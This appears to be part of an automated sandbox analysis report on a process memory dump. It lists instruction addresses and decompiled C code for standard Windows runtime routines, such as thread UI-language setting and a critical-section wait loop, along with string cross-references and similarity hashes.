0x049028f5
0x049028f8
0x049028f8
0x00000000
0x049028f8
0x00000000
0x00000000
0x04902866
0x04902866
0x04902876
0x04902879
0x00000000
0x00000000
0x049027e0
0x049027e7
0x049027e9
0x049027eb
0x04945afd
0x00000000
0x04945afd
0x00000000
0x00000000
0x04902633
0x04902638
0x0490263b
0x0490263c
0x0490263e
0x04902640
0x04902642
0x04902647
0x04902649
0x0490264e
0x04902650
0x04902653
0x04902659
0x049026a2
0x049026a7
0x049026ac
0x049026b2
0x04945b11
0x04945b15
0x04945b17
0x00000000
0x049026b8
0x049026b8
0x049026ba
0x049027a6
0x049027a6
0x049027a9
0x049027ab
0x049027b9
0x049027b9
0x049027be
0x049027c1
0x049027c3
0x049027c5
0x049027c7
0x04945c74
0x04945c79
0x04945c79
0x049027c7
0x00000000
0x049026c0
0x049026c0
0x049026c3
0x049026c6
0x049026c6
0x049026c9
0x049026c9
0x00000000
0x049026c9
0x049026ba
0x0490265b
0x0490265b
0x0490265e
0x04902667
0x0490266d
0x04902677
0x0490267c
0x0490267f
0x04902681
0x04945b49
0x04945b4e
0x049027cd
0x049027d0
0x049027d1
0x049027d2
0x049027d4
0x049027dd
0x04902687
0x04902687
0x0490268a
0x0490268b
0x0490268e
0x0490268f
0x04902691
0x04902696
0x04902698
0x0490269d
0x0490269f
0x00000000
0x0490269f
0x04902681
0x00000000
0x00000000
0x04902846
0x00000000
0x00000000
0x04902605
0x0490260a
0x0490260c
0x04902611
0x04902616
0x04902619
0x04902619
0x0490261e
0x00000000
0x04902624
0x04902627
0x04902627
0x00000000
0x00000000
0x04945b1f
0x00000000
0x00000000
0x04902894
0x0490289b
0x0490289d
0x049028a1
0x04945b2b
0x04945b2e
0x04945b2e
0x049028a7
0x049028a9
0x04945b04
0x04945b09
0x04945b09
0x04945b09
0x00000000
0x00000000
0x04945b35
0x04945b3c
0x049028fb
0x049028fb
0x049026cc
0x049026cc
0x049026d0
0x00000000
0x049026d2
0x049026d2
0x00000000
0x049026d2
0x00000000
0x00000000
0x049025fe
0x0490292d
0x04902930
0x04902935
0x04902938
0x0490293a
0x04902944
0x04902946
0x04902950
0x04902952
0x04902958
0x0490295a
0x04902962
0x04902964
0x04902966
0x0490296e
0x04902972
0x04902973
0x04902976
0x0490297e
0x0490297f
0x04902980
0x04902981
0x04902982
0x04902983
0x04902984
0x04902985
0x04902986
0x04902987
0x04902988
0x04902989
0x0490298a
0x0490298b
0x0490298c
0x0490298d
0x0490298e
0x0490298f
0x04902990
0x04902992
0x04902997
0x049029a3
0x049029a6
0x049029ab
0x049029ad
0x049029b0
0x049029b2
0x04945c80
0x049029b8
0x049029b8
0x049029bb
0x049029c0
0x049029c5
0x049029c6
0x049029c6
0x049029c9
0x049029cb
0x00000000
0x00000000
0x049029cd
0x049029d0
0x049029d9
0x049029db
0x049029dd
0x04902a7f
0x04902a84
0x04902a87
0x04902a89
0x04945ca1
0x04945ca3
0x00000000
0x04902a8f
0x04902a8f
0x00000000
0x04902a8f
0x00000000
0x049029e3
0x049029e3
0x049029e3
0x00000000
0x049029e3
0x049029dd
0x00000000
0x049029db
0x049029e6
0x049029e9
0x049029eb
0x049029ed
0x049029f3
0x049029f5
0x049029f8
0x049029fa
0x04902a97
0x04902a9a
0x04902a9d
0x04902add
0x00000000
0x04902a9f
0x04902aa2
0x04902aa5
0x04902aa8
0x04902aab
0x04945cab
0x04945caf
0x04945cc5
0x04945cda
0x04945cdc
0x04945cdf
0x04945ce5
0x00000000
0x04945ceb
0x04945ced
0x04945cee
0x00000000
0x04945cee
0x04945cb1
0x04945cb4
0x04945cb9
0x04945cbb
0x00000000
0x04945cbd
0x04945cbd
0x00000000
0x04945cbd
0x04945cbb
0x04902ab1
0x04902ab1
0x04902ac4
0x04902ac6
0x04902ac6
0x00000000
0x04902ac6
0x04902aab
0x00000000
0x04902a00
0x04902a09
0x04902a0e
0x04902a21
0x04902a24
0x04902a35
0x04902a3a
0x04902a3d
0x04902a42
0x04902a59
0x04902a59
0x04902a5c
0x04902a5f
0x04902a5f
0x049029fa
0x049029f3
0x04902a64
0x04902a64
0x04902a6b
0x04902a6b
0x04902a6d
0x04902a72
0x04902a72
0x00000000

Strings

PATH, xrefs: 04902642, 04902691

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: 5935aa0d7a540f5bcd67d8e694bdb8f5baa34ba48bf8d055fc76ee2794e3bbce
Instruction ID: 221c377bf74cf5df24aa17a073b3cf7267896d107ded6d0f2f144b83c322fa56
Opcode Fuzzy Hash: 5935aa0d7a540f5bcd67d8e694bdb8f5baa34ba48bf8d055fc76ee2794e3bbce
Instruction Fuzzy Hash: 03C18D71E00219EFDB24DF98D884AADB7B5FF88754F148479E901AB290E734BD42CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0490FAB0, Relevance: 1.6, Strings: 1, Instructions: 306
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0490FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E048EEEF0(0x49c7b60);
					_t134 =  *0x49c7b84; // 0x77f07b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x49c7b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x49c7b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E048E6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E048E76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E04978938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E048DB150();
													}
													_t116 = E04976D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E048E75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x49c8638; // 0x521bf0
																	_t122 = L048E38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E048E76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E048E76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L0490FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L048E70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E0490FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E0490FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E0490FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E0490FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E0490FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x49c7b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x49c7b84 = _t75;
						_t73 = E048EEB70(_t134, 0x49c7b60);
						if( *0x49c7b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E048EFF60( *0x49c7b20);
							}
						}
						goto L5;
					}
				}
			}

0x0490fab0
0x0490fab2
0x0490fab3
0x0490fab4
0x0490fabc
0x0490fac0
0x0490fb14
0x0490fb17
0x0490fac2
0x0490fac8
0x0490facd
0x0490fad3
0x0490fad3
0x0490fadd
0x0490fb18
0x0490fb1b
0x0490fb1d
0x0490fb1e
0x0490fb1f
0x0490fb20
0x0490fb21
0x0490fb22
0x0490fb23
0x0490fb24
0x0490fb25
0x0490fb26
0x0490fb27
0x0490fb28
0x0490fb29
0x0490fb2a
0x0490fb2b
0x0490fb2c
0x0490fb2d
0x0490fb2e
0x0490fb2f
0x0490fb3a
0x0490fb3b
0x0490fb3e
0x0490fb41
0x0490fb44
0x0490fb47
0x0490fb4a
0x0490fb4d
0x0490fb53
0x0494bdcb
0x0494bdcb
0x0490fb59
0x0490fb5b
0x0490fb5b
0x0490fb5e
0x0494bdd5
0x0494bdd8
0x00000000
0x0494bdda
0x00000000
0x0494bdda
0x0490fb64
0x0490fb64
0x0490fb64
0x0490fb67
0x0490fb6e
0x0490fb70
0x0490fb72
0x00000000
0x0490fb78
0x0490fb7a
0x0490fb7a
0x0490fb7d
0x0490fb80
0x0494bddf
0x0494bde1
0x00000000
0x0494bde3
0x00000000
0x0494bde3
0x0490fb86
0x0490fb86
0x0490fb86
0x0490fb8b
0x0490fb90
0x0490fb92
0x0490fb94
0x0490fb9a
0x0490fb9b
0x0490fba1
0x0494bde8
0x0494bdeb
0x0494bded
0x0494beb5
0x0494beb5
0x0494bebb
0x0494bebd
0x0494bec3
0x0494bed2
0x0494bedd
0x0494bedd
0x0494beed
0x00000000
0x0494bdf3
0x0494bdfe
0x0494be06
0x0494be0b
0x0494be0d
0x0494be0f
0x0494be14
0x0494be19
0x0494be20
0x0494be25
0x0494be27
0x0494be35
0x0494be39
0x0494be46
0x0494be4f
0x0494be54
0x0494be56
0x0494bef8
0x0494bef8
0x00000000
0x0494be5c
0x0494be5c
0x0494be60
0x00000000
0x0494be66
0x0494be66
0x0494be7f
0x0494be84
0x0494be87
0x0494be89
0x0494be8b
0x0494be99
0x0494be9d
0x0494bea0
0x0494beac
0x0494beaf
0x0494beb1
0x0494beb3
0x0494beb3
0x00000000
0x0494bea2
0x0494bea2
0x00000000
0x0494bea2
0x0494be8d
0x0494be8d
0x0494be92
0x00000000
0x0494be92
0x0494be8b
0x0494be60
0x0494be3b
0x0494be3b
0x0494be3e
0x00000000
0x0494be40
0x0494be40
0x0494be44
0x00000000
0x00000000
0x00000000
0x00000000
0x0494be44
0x0494be3e
0x0494be29
0x0494be29
0x00000000
0x0494be29
0x0494be27
0x00000000
0x0490fba7
0x0490fba7
0x0490fbab
0x0494bf02
0x0490fbb1
0x0490fbb1
0x0490fbb8
0x0490fbbd
0x0490fbbd
0x0490fbbf
0x0490fbbf
0x0490fbc5
0x0490fbcb
0x0490fbf8
0x0490fbf8
0x0490fbfa
0x00000000
0x0490fc00
0x0490fc00
0x0490fc03
0x00000000
0x0490fc09
0x0490fc09
0x0490fc0f
0x0490fc15
0x0490fc23
0x0490fc23
0x0490fc25
0x0490fc27
0x0490fc75
0x0490fc7c
0x0490fc84
0x00000000
0x0490fc29
0x0490fc29
0x0490fc2d
0x0490fc30
0x0494bf0f
0x00000000
0x0490fc36
0x0490fc38
0x0490fc3b
0x0490fc41
0x0494bf17
0x0494bf19
0x0494bf48
0x0494bf4b
0x00000000
0x0494bf1b
0x0494bf22
0x0494bf24
0x0494bf26
0x00000000
0x0494bf2c
0x0494bf37
0x0494bf39
0x0494bf3b
0x00000000
0x0494bf41
0x0494bf41
0x0494bf41
0x0494bf41
0x0494bf45
0x00000000
0x0494bf45
0x0494bf3b
0x0494bf26
0x00000000
0x0490fc47
0x0490fc47
0x0490fc49
0x0490fcb2
0x0490fcb4
0x0490fcb6
0x0490fcdc
0x0490fcdc
0x00000000
0x0490fcb8
0x0490fcc3
0x0490fcc5
0x0490fcc7
0x00000000
0x0490fcc9
0x0490fcc9
0x0490fccd
0x00000000
0x0490fccd
0x0490fcc7
0x00000000
0x0490fc4b
0x0490fc4b
0x0490fc4e
0x0490fc4e
0x0490fc51
0x0490fc51
0x0490fc54
0x0490fc5a
0x0490fc5c
0x0490fc5f
0x0490fc61
0x0490fc63
0x0490fc65
0x0490fc67
0x0490fc6e
0x0490fc72
0x0490fc72
0x0490fc72
0x0490fc72
0x0490fc67
0x0490fc61
0x00000000
0x0490fc5a
0x0490fc49
0x0490fc41
0x0490fc30
0x0490fc27
0x0490fc03
0x0490fbcd
0x0490fbd3
0x0490fbd9
0x0490fbdc
0x0490fbde
0x0490fc99
0x0490fc9b
0x0490fc9d
0x0490fcd5
0x0490fcd5
0x0490fc89
0x0490fc89
0x00000000
0x0490fc9f
0x0490fc9f
0x0490fca3
0x00000000
0x0490fca3
0x00000000
0x0490fbe4
0x0490fbe4
0x0490fbe4
0x0490fbe4
0x0490fbe9
0x0490fbf2
0x00000000
0x0490fbf2
0x0490fbde
0x0490fbcb
0x0490fbab
0x0490fc8b
0x0490fc8b
0x0490fc8c
0x0490fb80
0x0490fb72
0x0490fb5e
0x0490fc8d
0x0490fc91
0x0490fadf
0x0490fadf
0x0490fae1
0x0490fae4
0x0490fae7
0x0490faec
0x0490faf8
0x0490fb00
0x0490fb07
0x0490fb0f
0x0490fb0f
0x0490fb07
0x00000000
0x0490faf8
0x0490fadd

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0494BE0F

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
API String ID: 0-865735534
Opcode ID: 2b1bbb2252ae7d2b4daf9be4c37588b4d7707ee16299f0e4587c9b8cb9e7d2c4
Instruction ID: 207828e05c42474e4c9ee9bcc2a4d1af7389757b1116a0db502053e7be0605bd
Opcode Fuzzy Hash: 2b1bbb2252ae7d2b4daf9be4c37588b4d7707ee16299f0e4587c9b8cb9e7d2c4
Instruction Fuzzy Hash: B8A10471B006168FEB35DF69C454B7AB3A9AF84714F048979D806DB6C4EBB0FA41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 048D2D8A, Relevance: 1.4, Strings: 1, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E048D2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x49c5350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x49c7bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E049197C0();
				}
				if( *0x49c79c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x49c79c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E04901624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E048F7D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E0496FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E04919520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E0490E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L0492DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x49c6901;
								_push(_t109);
								_v52 = _t98;
								if( *0x49c6901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E04919980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E049195D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E048F7D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E048F7D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E04957016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E0496FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x49c5350;
							if(_t109 != 0x49c5350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E0496FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E04965720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}

0x048d2d8a
0x048d2d8a
0x048d2d92
0x048d2d96
0x048d2d9e
0x048d2da0
0x048d2da3
0x048d2da5
0x048d2da8
0x048d2dab
0x048d2db2
0x0492f9aa
0x0492f9ab
0x0492f9ae
0x0492f9ae
0x048d2db8
0x048d2dc2
0x0492f9b9
0x0492f9be
0x0492f9bf
0x0492f9bf
0x048d2dcf
0x0492f9c9
0x048d2dd5
0x048d2dd5
0x048d2dd5
0x048d2dde
0x048d2de1
0x048d2e70
0x048d2e72
0x048d2e72
0x048d2de7
0x048d2deb
0x048d2e7c
0x048d2e83
0x048d2e85
0x048d2e8b
0x048d2e8d
0x048d2e92
0x048d2e92
0x048d2e85
0x048d2df1
0x048d2df7
0x048d2df9
0x048d2df9
0x048d2dfc
0x048d2dff
0x048d2e02
0x00000000
0x048d2e05
0x048d2e0c
0x0492f9d9
0x048d2e12
0x048d2e12
0x048d2e12
0x048d2e1a
0x0492f9e3
0x0492f9e9
0x0492f9f0
0x0492f9f6
0x0492f9f8
0x0492f9f8
0x0492f9f0
0x048d2e23
0x0492fa02
0x0492fa03
0x0492fa05
0x0492fa06
0x00000000
0x048d2e29
0x048d2e29
0x048d2e2e
0x048d2e34
0x048d2e3e
0x00000000
0x00000000
0x048d2e44
0x048d2e47
0x048d2e4d
0x00000000
0x00000000
0x048d2e4f
0x048d2e54
0x00000000
0x00000000
0x048d2e5a
0x048d2e5f
0x048d2e9a
0x048d2ea4
0x048d2ea5
0x048d2ea8
0x048d2eaf
0x048d2eb2
0x048d2eb5
0x0492fae9
0x0492faeb
0x0492faed
0x0492faef
0x0492faf7
0x0492faf8
0x0492fafd
0x0492faff
0x0492fb04
0x0492fb04
0x0492faff
0x048d2ec0
0x048d2ec4
0x048d2ec6
0x048d2ec8
0x0492fb14
0x0492fb18
0x0492fb1e
0x0492fb21
0x0492fb21
0x048d2ece
0x048d2ece
0x048d2ece
0x048d2ed7
0x048d2e61
0x048d2e63
0x0492fa6b
0x0492fa71
0x0492fa76
0x0492fa78
0x0492fa8a
0x0492fa7a
0x0492fa83
0x0492fa83
0x0492fa8f
0x0492fa91
0x0492fa97
0x0492fa9d
0x0492faa4
0x0492faaa
0x0492faaf
0x0492fab1
0x0492fac3
0x0492fab3
0x0492fabc
0x0492fabc
0x0492fac8
0x0492facb
0x0492fadf
0x0492fadf
0x0492facb
0x0492faa4
0x0492fa91
0x048d2e6f
0x048d2e6f
0x048d2e5f
0x0492fa13
0x0492fa15
0x0492fa17
0x0492fa1f
0x0492fa21
0x0492fa22
0x0492fa25
0x0492fa28
0x0492fa2f
0x0492fa2f
0x0492fa2a
0x0492fa2a
0x0492fa2a
0x0492fa31
0x0492fa34
0x0492fa36
0x0492fa3c
0x0492fa3e
0x0492fa41
0x0492fa43
0x0492fa45
0x0492fa45
0x0492fa41
0x0492fa3c
0x0492fa4a
0x0492fa4f
0x0492fa51
0x0492fa53
0x0492fa56
0x0492fa5b
0x0492fa5e
0x00000000
0x0492fa5e
0x048d2e23

Strings

RTL: Re-Waiting, xrefs: 0492FA4A

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
